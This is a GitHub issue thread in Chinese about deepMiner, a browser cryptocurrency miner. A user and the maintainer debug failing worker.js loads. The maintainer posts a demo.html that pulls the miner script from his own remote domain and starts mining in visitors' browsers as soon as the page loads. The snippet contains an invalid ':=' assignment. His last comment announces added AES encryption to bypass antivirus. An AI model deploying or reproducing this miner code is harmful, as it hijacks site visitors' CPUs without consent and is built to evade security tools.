### ISSUE TITLE
是不是最近更新坏了？

### ISSUE THREAD

**Issue by tomiezhang** [deepwn/deepMiner#29]
hi 今天的更新是不是有点问题？昨天拉代码还是可以用的，今天再拉下来就不好用了，能帮忙看看怎么回事吗？反复装了好多遍install.sh都不行
https://ec2-13-229-219-110.ap-southeast-1.compute.amazonaws.com/demo.html
抓包看worker.js后面本来应该跟的blob的 但是现在都是undefind了
谢谢~

**Comment by evil7** [comment]
再pull一遍，然后`forever restartall`。估计是拉了我之前手残传错到master的一个dev版本了。
昨天测试的时候，有个参数设置错误不小心上传了一份到master，之后又提交了一份。
目前的版本我在vultr的VPS测试是可以运行的，你先试试重新拉代码，如果还不行我再看看怎么回事儿吧

**Comment by tomiezhang** [comment]
辛苦兄弟，试了下很不稳定，刷10次能有2次是OK的，换了台VPS一样，感觉是拉取worker.js那块生成blob时候的问题，能看看是怎么回事吗？谢谢

**Comment by evil7** [comment]
我的VPS刚刚拉了一次最新的，测试没有发现问题。。
不知道是不是AWS的机器在国内访问慢的原因，可能加载超时了。
还有就是域名和证书问题也会造成req出现err情况，你可以先看看访问我的demo有没有问题。
<https://deepc.cc/demo.html>

**Comment by evil7** [comment]
我这边又拉了一次repo重新install了。。
也`forever restartall`了。。
看了你的站，是存在这个问题，但是我这测试无法本地复现你目前的问题，没办法找到错误原因。。
抱歉

<img width="1627" alt="qq20171221-235418 2x" src="https://user-images.githubusercontent.com/6292673/34263391-4b69053a-e6aa-11e7-979f-4dfe76fc8f7b.png">

**Comment by tomiezhang** [comment]
https://qiers.com/demo.html
换了一台证书也换成正式的了，你的demo没有问题，应该是国外VPS访问太慢的原因，我看worker.js被拉了好几次，这个能解决吗？比如超时策略？

**Comment by tomiezhang** [comment]
https://qiers.com/demo.html 我换了一个VPS，证书也换成正式的了，问题依旧，我判断是VPS访问太慢的原因，worker.js加载有时候都3秒多，而且会被加载好几次，同时会生成一堆undfind的请求。。。你的代码没仔细看，我刚才console了下xhr的返回值和deepMiner.CRYPTONIGHT_WORKER_BLOB 都是正常的
![image](https://user-images.githubusercontent.com/295157/34263789-4bfe2c2e-e636-11e7-8e06-027a28da053a.png)

**Comment by evil7** [comment]
刚刚洗澡去了抱歉。
req响应出错的问题我明天来patch吧。。
得先去睡了。。明天上班到办公室看吧。。

给你提供个临时解决方案：把lib的文件放到静态分流的站，或者使用我这个demo站的静态文件。

直接修改`demo.html`里配置的外链`script.src`为我站点的`//deepc.cc/deepMiner.js`，在执行script的代码块`miner.start()`前面，比如最前面加上一行

```javascript
self.deepMiner.CONFIG.WEBSOCKET_SHARDS:=[["wss://站点的域名/proxy"]];
```

Example: demo.html

```html
<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<title>deepMiner</title>
	<style>
		th {
			width: 180px;
		}
	</style>
	<script src="//deepc.cc/deepMiner.js"></script>
	<script>
                self.deepMiner.CONFIG.WEBSOCKET_SHARDS:=[["wss://giers.com/proxy"]];
		var addr = 'deepMiner_test';
		var miner = new deepMiner.Anonymous(addr, {
			autoThreads: true
		});
		miner.start();
		// Listen on events
		var found = 0,
			accepted = 0;
		miner.on('found', function () {
			found++;
		});
		miner.on('accepted', function () {
			accepted++;
		})
		// Update stats once per second
		setInterval(function () {
			var idle = parseFloat(location.hash.split('#')[1]) || 0.5;
			var hashesPerSecond = miner.getHashesPerSecond();
			var totalHashes = miner.getTotalHashes();
			var acceptedHashes = miner.getAcceptedHashes();
			miner.setThrottle(idle);
			document.body.innerHTML = '<h2>deepMiner User : ' + addr +
				'</h2><table border="1"><tr><th>Threads</th><th>Hashs</th><th>Found</th><th>Verfiy</th></tr><tr><td>' + parseInt(
					hashesPerSecond) + '</td><td>' + totalHashes + '</td><td>' + found + '</td><td>' + accepted +
				'</td></tr></<table>';
		}, 500);
	</script>
</head>

<body>
	deepMiner
</body>

</html>
```

只是个临时解决方案，你先试一下明天我再来补漏。
别修仙了兄弟，拜，我得去睡了 🛌

**Comment by zanedeng** [comment]
设置forceASMJS: true就出现这个问题

**Comment by evil7** [comment]
已更新，包括AES随机加密bypass AV. check it out :)
